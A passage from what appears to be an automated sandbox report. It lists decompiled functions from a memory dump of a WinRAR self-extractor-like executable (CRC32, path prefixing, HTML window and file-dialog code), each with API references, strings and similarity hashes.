				_t52 = _a8;
				_t30 = _a4;
				_t72 = _a12;
				while(_t72 > 0 && (_t52 & 0x00000007) != 0) {
					_t30 = _t30 >> 0x00000008 ^  *(0x4305a0 + ( *_t52 & 0x000000ff ^ _t30 & 0x000000ff) * 4);
					_t72 = _t72 - 1;
					_t52 = _t52 + 1;
				}
				if(_t72 >= 8) {
					_a4 = _t72 >> 3;
					do {
						_t57 =  *(_t52 + 4);
						_t32 = _t30 ^  *_t52;
						_t72 = _t72 - 8;
						_t52 = _t52 + 8;
						_t26 =  &_a4;
						 *_t26 = _a4 - 1;
						_t30 =  *(0x4309a0 + (_t57 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4305a0 + (_t57 >> 0x18) * 4) ^  *(0x430da0 + (_t57 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4315a0 + (_t32 >> 0x18) * 4) ^  *(0x4319a0 + (_t32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x431da0 + (_t32 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4311a0 + (_t57 & 0x000000ff) * 4) ^  *(0x4321a0 + (_t32 & 0x000000ff) * 4);
					} while ( *_t26 != 0);
					L9:
					while(_t72 > 0) {
						_t30 = _t30 >> 0x00000008 ^  *(0x4305a0 + ( *_t52 & 0x000000ff ^ _t30 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
						_t52 = _t52 + 1;
					}
					return _t30;
				}
				goto L9;
			}

0x00405598
0x0040559b
0x0040559f
0x004055a3
0x004055b7
0x004055be
0x004055bf
0x004055bf
0x004055c5
0x004055d0
0x004055d4
0x004055d4
0x004055d7
0x00405641
0x00405644
0x00405647
0x00405647
0x0040564a
0x0040564a
0x00000000
0x00405665
0x0040565c
0x00405663
0x00405664
0x00405664
0x0040566c
0x0040566c
0x00000000

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
Instruction ID: f2d0c5f4bbcdbd34f02f86ebb25760818ebdb89b6a0315272ae23a15afae0393
Opcode Fuzzy Hash: ed9068bfa639142bf8b4c38fd82cdfd16adbe522c08585add70b4bf8b4f81ab1
Instruction Fuzzy Hash: 9221D872A146716BDB04CF65AC9452737A3D7CA321B9B4233DF805B3A5C134B922CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 00410A5B, Relevance: .0, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410A5B(intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				char _v20;
				unsigned int _t15;
				void* _t18;
				intOrPtr _t19;
				intOrPtr* _t24;

				_push(_t19);
				asm("cpuid");
				_t24 =  &_v20;
				 *_t24 = 1;
				 *((intOrPtr*)(_t24 + 4)) = _t19;
				 *((intOrPtr*)(_t24 + 8)) = 0;
				 *((intOrPtr*)(_t24 + 0xc)) = __edx;
				if((_v12 & 0x00080000) == 0) {
					if((_v12 & 0x00000200) == 0) {
						_t15 = _v8;
						if((_t15 & 0x04000000) == 0) {
							return _t15 >> 0x00000019 & 0x00000001;
						} else {
							_push(2);
							goto L2;
						}
					} else {
						_push(3);
						goto L2;
					}
				} else {
					_push(4);
					L2:
					_pop(_t18);
					return _t18;
				}
			}

0x00410a63
0x00410a67
0x00410a6a
0x00410a6d
0x00410a6f
0x00410a72
0x00410a75
0x00410a81
0x00410a8f
0x00410a95
0x00410a9d
0x00410aaa
0x00410a9f
0x00410a9f
0x00000000
0x00410a9f
0x00410a91
0x00410a91
0x00000000
0x00410a91
0x00410a83
0x00410a83
0x00410a85
0x00410a85
0x00410a87
0x00410a87

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
Instruction ID: 75d592682fe1cf561c717e7d15a5faf23f6b553a51b6a5808f048eac38eefa16
Opcode Fuzzy Hash: 8242d2adca0ee77033965afe3d9840a22183be55bece64a87820915d62a16758
Instruction Fuzzy Hash: 93F082B2A407059AE720DE58E8467EBB7E8EF10748F24C41FD9A6E62C0C2F8D5C1CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0040A582, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A582(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4100;
				signed short* _t26;
				long _t28;
				signed short* _t29;
				void* _t35;
				signed short* _t49;
				void* _t58;
				signed short* _t75;
				signed short* _t76;

				E0041A3E0(0x1000);
				_t75 = _a4;
				if( *_t75 != 0) {
					E0040A017(_t75);
					_t58 = E0041A0A7(_t75);
					_t26 = E0040A4BE(_t75);
					__eflags = _t26;
					if(_t26 == 0) {
						_t28 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t28;
						if(_t28 == 0) {
							L21:
							_t29 = 0;
							__eflags = 0;
							L22:
							return _t29;
						}
						__eflags = _t28 - 0x7ff;
						if(_t28 > 0x7ff) {
							goto L21;
						}
						__eflags = E00409DC6( *_t75 & 0x0000ffff);
						if(__eflags == 0) {
							E00409DEB(__eflags,  &_v4100, 0x800);
							_t35 = E0041A0A7( &_v4100);
							__eflags = _a12 - _t35 + _t58 + 4;
							if(_a12 <= _t35 + _t58 + 4) {
								goto L21;
							}
							_t68 = _a8;
							E0041C2C1(_a8, L"\\\\?\\", 4);
							E0041A0EF(_t68 + 8,  &_v4100);
							__eflags =  *_t75 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00409DC6(_t75[1] & 0x0000ffff);
								if(__eflags != 0) {
									__eflags = _t75;
								}
							}
							E004107BC(__eflags, _t68, _t75, _a12);
							L20:
							_t29 = 1;
							goto L22;
						}
						__eflags = _a12 - _t58 + 6;
						if(_a12 <= _t58 + 6) {
							goto L21;
						}
						_t69 = _a8;
						E0041C2C1(_a8, L"\\\\?\\", 4);
						E0041C2C1(_t69 + 8,  &_v4100, 2);
						E0041A0EF(_t69 + 0xc, _t75);
						goto L20;
					}
					_t49 = E0040A017(_t75);
					__eflags = _t49;
					if(_t49 == 0) {
						__eflags =  *_t75 - 0x5c;
						if( *_t75 != 0x5c) {
							goto L21;
						}
						_t76 =  &(_t75[1]);
						__eflags =  *_t76 - 0x5c;
						if( *_t76 != 0x5c) {
							goto L21;
						}
						__eflags = _a12 - _t58 + 6;
						if(_a12 <= _t58 + 6) {
							goto L21;
						}
						_t71 = _a8;
						E0041C2C1(_a8, L"\\\\?\\", 4);
						E0041A0EF(_t71 + 8, L"UNC");
						E0041A0EF(_t71 + 0xe, _t76);
						goto L20;
					}
					__eflags = _a12 - _t58 + 4;
					if(_a12 <= _t58 + 4) {
						goto L21;
					}
					_t73 = _a8;
					E0041C2C1(_a8, L"\\\\?\\", 4);
					E0041A0EF(_t73 + 8, _t75);
					goto L20;
				}
				return 0;
			}

0x0040a58a
0x0040a590
0x0040a597
0x0040a5a3
0x0040a5b0
0x0040a5b2
0x0040a5b7
0x0040a5b9
0x0040a657
0x0040a65d
0x0040a65f
0x0040a726
0x0040a726
0x0040a726
0x0040a728
0x00000000
0x0040a729
0x0040a665
0x0040a667
0x00000000
0x00000000
0x0040a676
0x0040a678
0x0040a6c3
0x0040a6cf
0x0040a6d9
0x0040a6dc
0x00000000
0x00000000
0x0040a6de
0x0040a6e9
0x0040a6f9
0x0040a701
0x0040a705
0x0040a711
0x0040a713
0x0040a715
0x0040a715
0x0040a713
0x0040a71d
0x0040a722
0x0040a722
0x00000000
0x0040a722
0x0040a67d
0x0040a680
0x00000000
0x00000000
0x0040a686
0x0040a691
0x0040a6a3
0x0040a6ad
0x00000000
0x0040a6b2
0x0040a5c0
0x0040a5c5
0x0040a5c7
0x0040a5f7
0x0040a5fb
0x00000000
0x00000000
0x0040a601
0x0040a604
0x0040a608
0x00000000
0x00000000
0x0040a611
0x0040a614
0x00000000
0x00000000
0x0040a61a
0x0040a625
0x0040a633
0x0040a63d
0x00000000
0x0040a642
0x0040a5cc
0x0040a5cf
0x00000000
0x00000000
0x0040a5d5
0x0040a5e0
0x0040a5ea
0x00000000
0x0040a5ef
0x00000000

APIs

_wcslen.LIBCMT ref: 0040A5A9
_wcsncpy.LIBCMT ref: 0040A5E0
_wcscpy.LIBCMT ref: 0040A5EA

Strings

\\?\, xrefs: 0040A5DA, 0040A61F, 0040A68B, 0040A6E3
UNC, xrefs: 0040A62D

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy_wcslen_wcsncpy
String ID: UNC$\\?\
API String ID: 677062453-253988292
Opcode ID: 254b53e59ebf3a9f8465e87f85bba4f64003ce48c452ae2c988ab782fc7e71cb
Instruction ID: 92aff8ffad833a1538bac4ad6f5bf2581c951d0ff424c474a4019b653aa5c228
Opcode Fuzzy Hash: 254b53e59ebf3a9f8465e87f85bba4f64003ce48c452ae2c988ab782fc7e71cb
Instruction Fuzzy Hash: DB41A57694031467CB20AE618C82BEB3368AF45758F14842FF94477282E77CD9A157AF

Uniqueness

Uniqueness Score: -1.00%

Function 0041906D, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041906D(void* __ebx, intOrPtr __ecx, short* _a4, char _a7) {
				short* _v8;
				signed int _v12;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t26;
				short* _t30;
				signed int _t34;
				signed int _t42;
				int _t43;
				void* _t51;
				char* _t52;
				void* _t66;
				void* _t67;
				short* _t68;
				short* _t71;
				int _t75;

				_v16 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 0) {
					return _t26;
				}
				_v12 = _v12 & 0x00000000;
				_t71 = _a4;
				_push(_t67);
				_a7 = E00418D92(_t71);
				_t30 = E0041C86E(__ebx, _t66, _t67, E0041A0A7(_t71) + _t28 + 0x200);
				_t68 = _t30;
				if(_t68 == 0) {
					L16:
					return _t30;
				}
				_push(__ebx);
				_t48 = L"<html>";
				E0041A0EF(_t68, L"<html>");
				E0041A0C1(_t68, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E0041A0C1(_t68, L"utf-8\"></head>");
				_v8 = _t71;
				if( *_t71 != 0x20) {
					L4:
					_t34 = E004119C7(_t82, _v8, _t48, 6);
					asm("sbb bl, bl");
					_t51 =  ~_t34 + 1;
					if(_t51 != 0) {
						_t71 = _v8 + 0xc;
					}
					E0041A0C1(_t68, _t71);
					if(_t51 == 0) {
						E0041A0C1(_t68, L"</html>");
					}
					_t86 = _a7;
					if(_a7 == 0) {
						_t68 = E00418DC8(_t51, _t86, _t68);
					}
					_t75 = 9 + E0041A0A7(_t68) * 6;
					_t52 = GlobalAlloc(0x40, _t75);
					if(_t52 != 0) {
						_t75 = _t75 + 0xfffffffd;
						_t17 = _t52 + 3; // 0x3
						_t43 = WideCharToMultiByte(0xfde9, 0, _t68, 0xffffffff, _t17, _t75, 0, 0);
						_t88 = _t43;
						if(_t43 == 0) {
							 *_t52 = 0;
						} else {
							 *_t52 = 0xef;
							 *((char*)(_t52 + 1)) = 0xbb;
							 *((char*)(_t52 + 2)) = 0xbf;
						}
					}
					E00419DFE(_t52, _t68, _t75, _t88);
					_t30 =  &_v12;
					__imp__CreateStreamOnHGlobal(_t52, 1, _t30, _t68);
					if(_t30 >= 0) {
						E00418CBB( *((intOrPtr*)(_v16 + 0xc)), _v12);
						_t42 = _v12;
						_t30 =  *((intOrPtr*)( *_t42 + 8))(_t42);
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_v8 = _v8 + 2;
					_t82 =  *_v8 - 0x20;
				} while ( *_v8 == 0x20);
				goto L4;
			}

0x00419077
0x0041907a
0x004191b3
0x004191b3
0x00419080
0x00419085
0x00419088
0x00419090
0x004190a0
0x004190a5
0x004190ab
0x004191b0
0x00000000
0x004191b1
0x004190b1
0x004190b2
0x004190b9
0x004190c4
0x004190cf
0x004190db
0x004190de
0x004190ed
0x004190f3
0x004190fc
0x004190fe
0x00419100
0x00419105
0x00419105
0x0041910a
0x00419113
0x0041911b
0x00419121
0x00419122
0x00419126
0x00419131
0x00419131
0x0041913f
0x0041914b
0x00419151
0x00419155
0x00419159
0x00419166
0x0041916c
0x0041916e
0x0041917d
0x00419170
0x00419170
0x00419173
0x00419177
0x00419177
0x0041916e
0x00419181
0x00419187
0x0041918e
0x00419197
0x004191a2
0x004191a7
0x004191ad
0x004191ad
0x00000000
0x00000000
0x00000000
0x00000000
0x004190e0
0x004190e0
0x004190e0
0x004190e7
0x004190e7
0x00000000

APIs

_wcslen.LIBCMT ref: 00419093
_malloc.LIBCMT ref: 004190A0

Part of subcall function 0041C86E: __FF_MSGBANNER.LIBCMT ref: 0041C891
Part of subcall function 0041C86E: __NMSG_WRITE.LIBCMT ref: 0041C898
Part of subcall function 0041C86E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004208E4,00000000,00000001,00000000,?,0041E92D,00000018,0042D8F0,0000000C,0041E9BE), ref: 0041C8E5

_wcscpy.LIBCMT ref: 004190B9
_wcscat.LIBCMT ref: 004190C4
_wcscat.LIBCMT ref: 004190CF
_wcscat.LIBCMT ref: 0041910A
_wcscat.LIBCMT ref: 0041911B
_wcslen.LIBCMT ref: 00419134
GlobalAlloc.KERNEL32(00000040,-00000009,?,<html>,00000006,?,?,?,00000000), ref: 00419145
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000,?,?,?,00000000), ref: 00419166
CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000,?,?,?,00000000), ref: 0041918E

Strings

</html>, xrefs: 00419115
<html>, xrefs: 004190B2, 004190B7, 004190EF
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 004190BE
utf-8"></head>, xrefs: 004190C9

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscat$Global_wcslen$AllocAllocateByteCharCreateHeapMultiStreamWide_malloc_wcscpy
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 4158105118-4209811716
Opcode ID: e46690a5feaa4cde99bdd92779e372da72a1c988b8d90be14f65cff4f912f405
Instruction ID: 287faae8055021b33c446916b7cda098de1ae9885ed90b9c4914c8140b364907
Opcode Fuzzy Hash: e46690a5feaa4cde99bdd92779e372da72a1c988b8d90be14f65cff4f912f405
Instruction Fuzzy Hash: F73116329012157BDB20AB659C86FEE7BB89B45324F14819EF8016B2C2DB3C5DC1836A

Uniqueness

Uniqueness Score: -1.00%

Function 00419542, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00419542(void* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16, int _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				long _t43;
				struct HWND__* _t47;
				void* _t53;
				void* _t69;
				WCHAR* _t71;

				_t69 = __ecx;
				 *((char*)(__ecx + 0x21)) = _a20;
				ShowWindow(_a8, 0);
				E004194DB(_t69, _a4);
				 *(_t69 + 0x10) = _a12;
				 *((intOrPtr*)(_t69 + 0x14)) = _a16;
				GetWindowRect(_a8,  &_v20);
				_t53 = GetParent;
				MapWindowPoints(0, GetParent(_a8),  &_v20, 2);
				_t42 =  *(_t69 + 4);
				if(_t42 != 0) {
					DestroyWindow(_t42);
				}
				_t43 = _v20.x;
				_a20 = _t43 + 1;
				_t47 = CreateWindowExW(0, L"RarHtmlClassName", 0, 0x40000000, _a20, _v20.y, _v12 - _t43, _v8 - _v20.y, GetParent(_a8), 0,  *_t69, _t69);
				 *(_t69 + 4) = _t47;
				if( *((intOrPtr*)(_t69 + 0xc)) != 0) {
					__eflags = _t47;
					if(_t47 != 0) {
						ShowWindow(_t47, 5);
						_t47 = UpdateWindow( *(_t69 + 4));
					}
					__eflags =  *((intOrPtr*)(_t69 + 0x1c)) - 0x64;
					if( *((intOrPtr*)(_t69 + 0x1c)) > 0x64) {
						_t47 = E00418EC0(_t69);
					}
				} else {
					if(_a8 != 0 &&  *((intOrPtr*)(_t69 + 0x14)) == 0) {
						_t47 =  *(_t69 + 0x10);
						_t79 = _t47;
						if(_t47 != 0) {
							_push(_t47);
							_t47 = E004191B6(_t53, _t69, _t79);
							_t71 = _t47;
							_t80 = _t71;
							if(_t71 != 0) {
								ShowWindow(_a8, 5);
								SetWindowTextW(_a8, _t71);
								_push(_t71);
								_t47 = E00419DFE(_t53, 0, _t71, _t80);
							}
						}
					}
				}
				return _t47;
			}

0x00419553
0x00419555
0x00419558
0x00419563
0x0041956b
0x00419571
0x0041957b
0x00419581
0x00419595
0x0041959b
0x004195a0
0x004195a3
0x004195a3
0x004195a9
0x004195bd
0x004195e0
0x004195e6
0x004195ec
0x0041962b
0x0041962d
0x00419632
0x0041963b
0x0041963b
0x00419641
0x00419645
0x00419649
0x00419649
0x004195ee
0x004195f1
0x004195f8
0x004195fb
0x004195fd
0x004195ff
0x00419602
0x00419607
0x00419609
0x0041960b
0x00419612
0x0041961c
0x00419622
0x00419623
0x00419628
0x0041960b
0x004195fd
0x004195f1
0x00419652

APIs

ShowWindow.USER32(?,00000000,00000000,?,?), ref: 00419558

Part of subcall function 004194DB: LoadCursorW.USER32(00000000,00007F00), ref: 00419512
Part of subcall function 004194DB: RegisterClassExW.USER32 ref: 00419533

GetWindowRect.USER32 ref: 0041957B
GetParent.USER32(?), ref: 00419590
MapWindowPoints.USER32 ref: 00419595
DestroyWindow.USER32(?), ref: 004195A3
GetParent.USER32(?), ref: 004195C1
CreateWindowExW.USER32 ref: 004195E0
ShowWindow.USER32(?,00000005,?), ref: 00419612
SetWindowTextW.USER32(?,00000000), ref: 0041961C
ShowWindow.USER32(00000000,00000005), ref: 00419632
UpdateWindow.USER32(?), ref: 0041963B

Strings

RarHtmlClassName, xrefs: 004195DA

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
String ID: RarHtmlClassName
API String ID: 3841971108-1658105358
Opcode ID: 1472ca7011d56e64ba87d4f3e7d6d350b20b11e35c455b1f308b9de38168a69f
Instruction ID: 5707509b27b3c753356fe4c55947ed204534ccaa5e1692520dff8bba755bf0ec
Opcode Fuzzy Hash: 1472ca7011d56e64ba87d4f3e7d6d350b20b11e35c455b1f308b9de38168a69f
Instruction Fuzzy Hash: 9931BE31604608EFCB329FA4DC48EAF7BB9EF44710F10442AF81697210DB35AD51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405104, Relevance: 21.1, APIs: 14, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00405104(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, char _a20) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				short* _v64;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v1116;
				void* __edi;
				signed int _t40;
				intOrPtr _t44;
				signed int _t48;
				signed int _t57;
				void* _t61;
				signed int _t62;
				void* _t64;
				char _t65;
				short* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				signed int _t76;

				_t63 =  &_v1116;
				if(_a16 != 0) {
					E0041A0EF( &_v1116, _a16);
					_t67 = _t68 + E0041A0A7( &_v1116) * 2 - 0x456;
					E0041A0EF(_t67, _a16);
					_t57 = E0041A0A7(_t67);
					_t69 = _t69 + 0x18;
					_t63 = _t67 + 2 + _t57 * 2;
				}
				E0041A0EF(_t63, E0040C05C(0xa2));
				_t64 = _t63 + 2 + E0041A0A7(_t63) * 2;
				E0041A0EF(_t64, 0x42a538);
				_t40 = E0041A0A7(_t64);
				 *((short*)(_t64 + 2 + _t40 * 2)) = 0;
				_t65 = 0x58;
				E0041A110(_t61,  &_v92, 0, _t65);
				_v88 = _a4;
				_t44 =  *0x432a68; // 0x400000
				_v84 = _t44;
				_v80 =  &_v1116;
				_v92 = _t65;
				_t66 = _a12;
				_v44 = _a8;
				_v64 = _t66;
				_v60 = 0x800;
				_v40 = 0x1080c;
				_push( &_v92);
				if(_a20 == 0) {
					_t48 = GetOpenFileNameW();
				} else {
					_t48 = GetSaveFileNameW();
				}
				_t62 = _t48;
				if(_t62 == 0) {
					_t48 = CommDlgExtendedError();
					if(_t48 == 0x3002) {
						 *_t66 = 0;
						_push( &_v92);
						if(_a20 == 0) {
							_t48 = GetOpenFileNameW();
						} else {
							_t48 = GetSaveFileNameW();
						}
						_t62 = _t48;
					}
					_t76 = _t62;
				}
				return _t48 & 0xffffff00 | _t76 != 0x00000000;
			}

0x00405114
0x0040511a
0x00405122
0x00405132
0x0040513a
0x00405140
0x00405145
0x00405148
0x00405148
0x00405158
0x00405163
0x0040516d
0x00405173
0x0040517c
0x00405181
0x00405188
0x00405196
0x00405199
0x0040519e
0x004051a7
0x004051b4
0x004051b7
0x004051ba
0x004051c0
0x004051c3
0x004051ca
0x004051d1
0x004051d2
0x004051dc
0x004051d4
0x004051d4
0x004051d4
0x004051de
0x004051e2
0x004051e4
0x004051ef
0x004051f7
0x004051fd
0x004051fe
0x00405208
0x00405200
0x00405200
0x00405200
0x0040520a
0x0040520a
0x0040520c
0x0040520c
0x00405215

APIs

_wcscpy.LIBCMT ref: 00405122
_wcslen.LIBCMT ref: 0040512A
_wcscpy.LIBCMT ref: 0040513A
_wcslen.LIBCMT ref: 00405140
_wcscpy.LIBCMT ref: 00405158
_wcslen.LIBCMT ref: 0040515E
_wcscpy.LIBCMT ref: 0040516D
_wcslen.LIBCMT ref: 00405173
_memset.LIBCMT ref: 00405188
GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 004051D4
GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 004051DC
CommDlgExtendedError.COMDLG32(?,?,?,?,?,000000A2), ref: 004051E4
GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405200
GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405208

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FileName_wcscpy_wcslen$OpenSave$CommErrorExtended_memset
String ID:
API String ID: 3496903968-0
Opcode ID: 7fd8abfc02dd77280b0efcfabe4bec56b9122e49a8314f844fef75f945aed654
Instruction ID: 10ddc6880704674fc9ff4c0766427d37e204595a3972f3d192bc4ea40140f25c
Opcode Fuzzy Hash: 7fd8abfc02dd77280b0efcfabe4bec56b9122e49a8314f844fef75f945aed654
Instruction Fuzzy Hash: 3B31B971901614ABCB21AFA5DC45ACF7FB8EF09314F10402EF905B7241DB389995CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041E254, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041E254(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x42d860);
				E0041F49C(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00420A55(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x42b960;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x42f878;
				E0041E9A3(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0041E329();
				E0041E9A3(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x42fe80; // 0x42fda8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00421BA3( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0041F4E1(E0041E332());
			}

0x0041e254
0x0041e254
0x0041e256
0x0041e25b
0x0041e260
0x0041e266
0x0041e26e
0x0041e271
0x0041e276
0x0041e277
0x0041e27a
0x0041e27d
0x0041e287
0x0041e28c
0x0041e294
0x0041e29c
0x0041e2ac
0x0041e2ac
0x0041e2b2
0x0041e2b5
0x0041e2bc
0x0041e2c3
0x0041e2cc
0x0041e2d2
0x0041e2d9
0x0041e2df
0x0041e2e6
0x0041e2ed
0x0041e2f3
0x0041e2f6
0x0041e2f9
0x0041e2fe
0x0041e300
0x0041e305
0x0041e305
0x0041e30b
0x0041e311
0x0041e322

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D860,0000000C,0041E38F,00000000,00000000,?,0041F878,0041A2AA,00000456,?,?,0041A2AA,00000000,?), ref: 0041E266
__crt_waiting_on_module_handle.LIBCMT ref: 0041E271

Part of subcall function 00420A55: Sleep.KERNEL32(000003E8,00000000,?,0041E1B7,KERNEL32.DLL,?,0041E203,?,0041F878,0041A2AA,00000456,?,?,0041A2AA,00000000,?), ref: 00420A61
Part of subcall function 00420A55: GetModuleHandleW.KERNEL32(00000000,?,0041E1B7,KERNEL32.DLL,?,0041E203,?,0041F878,0041A2AA,00000456,?,?,0041A2AA,00000000,?), ref: 00420A6A

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041E29A
GetProcAddress.KERNEL32(0041A2AA,DecodePointer), ref: 0041E2AA
__lock.LIBCMT ref: 0041E2CC
InterlockedIncrement.KERNEL32(?), ref: 0041E2D9
__lock.LIBCMT ref: 0041E2ED
___addlocaleref.LIBCMT ref: 0041E30B

Strings

KERNEL32.DLL, xrefs: 0041E260, 0041E265, 0041E270
DecodePointer, xrefs: 0041E2A2
EncodePointer, xrefs: 0041E28E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

